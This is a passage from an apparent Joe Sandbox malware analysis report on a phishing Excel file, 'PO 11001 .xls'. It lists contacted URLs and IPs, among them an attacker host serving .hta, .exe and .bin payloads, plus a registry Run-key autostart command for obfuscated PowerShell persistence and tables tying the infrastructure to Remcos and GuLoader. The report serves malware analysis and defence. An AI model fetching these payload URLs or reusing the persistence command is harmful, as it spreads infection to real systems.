          http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
          http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe |
          http://192.3.220.22/ | 0% | Virustotal | | Browse
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Virustotal | | Browse
          https://support.google.com/chrome/?p=plugin_flash | 0% | Virustotal | | Browse
          https://og1.in/ | 0% | Virustotal | | Browse
          http://www.diginotar.nl/cps/pkioverheid0 | 0% | Virustotal | | Browse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookine | 0% | Virustotal | | Browse
          https://og1.in/2Rxzb3 | 0% | Virustotal | | Browse
          https://login.yahoo.com/config/login | 0% | Virustotal | | Browse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC: | 0% | Virustotal | | Browse
          http://www.nirsoft.net/ | 0% | Virustotal | | Browse
          https://www.google.com | 0% | Virustotal | | Browse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta | 0% | Virustotal | | Browse
          http://192.3.220.22/430/dllhost. | 0% | Virustotal | | Browse
          http://crl.entrust.net/server1.crl0 | 0% | Virustotal | | Browse
          http://www.imvu.com | 0% | Virustotal | | Browse
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Virustotal | | Browse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaP | 0% | Virustotal | | Browse
          http://192.3.220.22/430/dllhost.exe | 0% | Virustotal | | Browse
          https://www.google.com/accounts/servicelogin | 0% | Virustotal | | Browse
          http://192.3.220.22/430/dllhost.exep | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
og1.in | 104.21.78.54 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://og1.in/2Rxzb3 | false | | unknown
http://192.3.220.22/hFXELFSwRHRwqbE214.bin | true | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta | true | | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://192.3.220.22/430/dllhost.exe | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://og1.in/2Rxzb3yX | mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/ | mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://og1.in/ | mshta.exe, 00000004.00000002.414718403.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414241682.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471568642.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.460570080.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.471985501.00000000003E4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.entrust.net03 | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://og1.in/2Rxzb3Z | mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://og1.in/2Rxzb3s | mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.google.com/chrome/?p=plugin_flash | Vaccinerende.exe, 00000022.00000003.836175427.00000000021E3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/ic | mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.diginotar.nl/cps/pkioverheid0 | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://og1.in/2Rxzb3w | mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://go.micros | powershell.exe, 00000007.00000002.434786957.0000000002703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002BAA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://og1.in/2Rxzb3C | mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com | Vaccinerende.exe | false | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookine | mshta.exe, 00000004.00000003.414430980.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.468769729.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470941601.0000000002D35000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://login.yahoo.com/config/login | Vaccinerende.exe | false | | unknown
http://192.3.220.22/videro | mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta9p | mshta.exe, 00000004.00000002.417244267.0000000003320000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC: | mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.459453313.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://og1.in/2Rxzb3W | mshta.exe, 0000000F.00000003.460570080.0000000000395000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.nirsoft.net/ | Vaccinerende.exe | false | | unknown
http://ocsp.entrust.net0D | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.434786957.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.781549529.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.937693979.0000000002451000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://192.3.220.22/430/dllhost.exe%m | powershell.exe, 00000007.00000002.447277326.000000001A99F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://go.cr | powershell.exe, 00000007.00000002.449310498.000000001C553000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaMy | mshta.exe, 0000000F.00000003.471733215.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472196529.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/430/dllhost. | powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://og1.in/2Rxzb3& | mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://go.microso | powershell.exe, 0000000C.00000002.775886453.00000000001E9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.imvu.com | Vaccinerende.exe | false | | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | dllhost.exe, 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, dllhost.exe, 0000000B.00000000.434267277.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000000.475272548.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, Vaccinerende.exe, 0000001C.00000000.717210149.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000032.00000000.848787403.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000039.00000000.901018571.000000000040A000.00000008.00000001.01000000.0000000D.sdmp | false | URL Reputation: safe | unknown
https://og1.in/ket | mshta.exe, 00000004.00000002.417244267.000000000332E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaQ | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaP | mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/accounts/servicelogin | Vaccinerende.exe | false | | unknown
http://192.3.220.22/430/dllhost.exep | powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://secure.comodo.com/CPS0 | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaF | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.entrust.net/2048ca.crl0 | mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.ebuddy.com | Vaccinerende.exe | false | | unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.78.54 | og1.in | United States | 13335 | CLOUDFLARENETUS | false
192.3.220.22 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
107.173.4.16 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.67.216.244 | unknown | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522508
Start date and time: 2024-09-30 09:52:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 58
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO 11001 .xls
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winXLS@72/66@4/5
                                                        EGA Information:
                                                        • Successful, ratio: 54.5%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 225
                                                        • Number of non-executed functions: 235
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .xls
                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                        • Attach to Office via COM
                                                        • Active ActiveX Object
                                                        • Active ActiveX Object
                                                        • Scroll down
                                                        • Close Viewer
                                                        • Override analysis time to 65596.3020900642 for current running targets taking high CPU consumption
                                                        • Override analysis time to 131192.604180128 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Execution Graph export aborted for target Vaccinerende.exe, PID 3116 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 1852 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 3924 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 3388 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3852 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:56:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)
00:56:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)
03:53:24 | API Interceptor | 109x Sleep call for process: mshta.exe modified
03:53:28 | API Interceptor | 952x Sleep call for process: powershell.exe modified
03:56:13 | API Interceptor | 1319x Sleep call for process: Vaccinerende.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        107.173.4.16SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                            xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                Mcib4Llptj.exeGet hashmaliciousRemcosBrowse
                                                                  SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exeGet hashmaliciousRemcosBrowse
                                                                    2NyX8R4CZo.exeGet hashmaliciousRemcosBrowse
                                                                      wcNDx6MT9O.exeGet hashmaliciousRemcosBrowse
                                                                        1Ccw7uyuFv.exeGet hashmaliciousRemcosBrowse
                                                                          RFQ_83747384738757384754837483.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
178.237.33.50 | ZIXBhdgf6y.exe | malicious | Remcos | geoplugin.net/json.gp
 | yVhGfho0R4.exe | malicious | Remcos | geoplugin.net/json.gp
 | C6DAEyTs7d.rtf | malicious | Remcos | geoplugin.net/json.gp
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | geoplugin.net/json.gp
 | dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | geoplugin.net/json.gp
 | oi2BC6zhUY.exe | malicious | Remcos | geoplugin.net/json.gp
 | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
 | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
 | SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | geoplugin.net/json.gp
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos | geoplugin.net/json.gp

Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | ZIXBhdgf6y.exe | malicious | Remcos | 178.237.33.50
 | yVhGfho0R4.exe | malicious | Remcos | 178.237.33.50
 | C6DAEyTs7d.rtf | malicious | Remcos | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 178.237.33.50
 | dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 178.237.33.50
 | oi2BC6zhUY.exe | malicious | Remcos | 178.237.33.50
 | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | Remcos, GuLoader | 178.237.33.50
 | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader | 178.237.33.50
 | SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos | 178.237.33.50

Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | ZIXBhdgf6y.exe | malicious | Remcos | 192.3.101.137
 | http://jeevankiranfoundationcenter.co.in/css/rrp.htm | malicious | Kutaki | 23.94.221.14
 | C6DAEyTs7d.rtf | malicious | Remcos | 104.168.32.148
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 107.172.130.147
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf | malicious | Remcos | 192.3.101.29
 | PO.xls | malicious | Remcos | 104.168.32.148
 | GEsD6lobvy.hta | malicious | Cobalt Strike, Snake Keylogger | 172.245.123.6
 | Shipping Document.docx.doc | malicious | Unknown | 104.168.32.148
 | Payment Advice.xls | malicious | Snake Keylogger | 172.245.123.6
 | AGMETIGA zapytanie ofertowe.xls | malicious | PureLog Stealer | 107.172.130.147
CLOUDFLARENETUS | RFQ-5120240930 VENETA PESCA SRL.vbs | malicious | VIP Keylogger | 188.114.97.3
 | https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871 | malicious | Unknown | 1.1.1.1
 | SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dll | malicious | Unknown | 188.114.97.3
 | SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dll | malicious | Unknown | 188.114.97.3
 | file.exe | malicious | Unknown | 172.67.74.152
 | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.1.169
 | file.exe | malicious | LummaC, Stealc, Vidar | 172.67.205.129
 | file.exe | malicious | Unknown | 104.21.54.163
 | https://wwvmicrosx.live/office365/office_cookies/main | malicious | HTMLPhisher | 188.114.96.3
 | CAPE MARS VSL'S PARTICULARS.docx.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
ATOM86-ASATOM86NL | ZIXBhdgf6y.exe | malicious | Remcos | 178.237.33.50
 | yVhGfho0R4.exe | malicious | Remcos | 178.237.33.50
 | C6DAEyTs7d.rtf | malicious | Remcos | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 178.237.33.50
 | dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 178.237.33.50
 | oi2BC6zhUY.exe | malicious | Remcos | 178.237.33.50
 | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | Remcos, GuLoader | 178.237.33.50
 | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader | 178.237.33.50
 | SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | 178.237.33.50
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos | 178.237.33.50

Match | Associated Sample Name / URL | Detection | Threat Name | Context
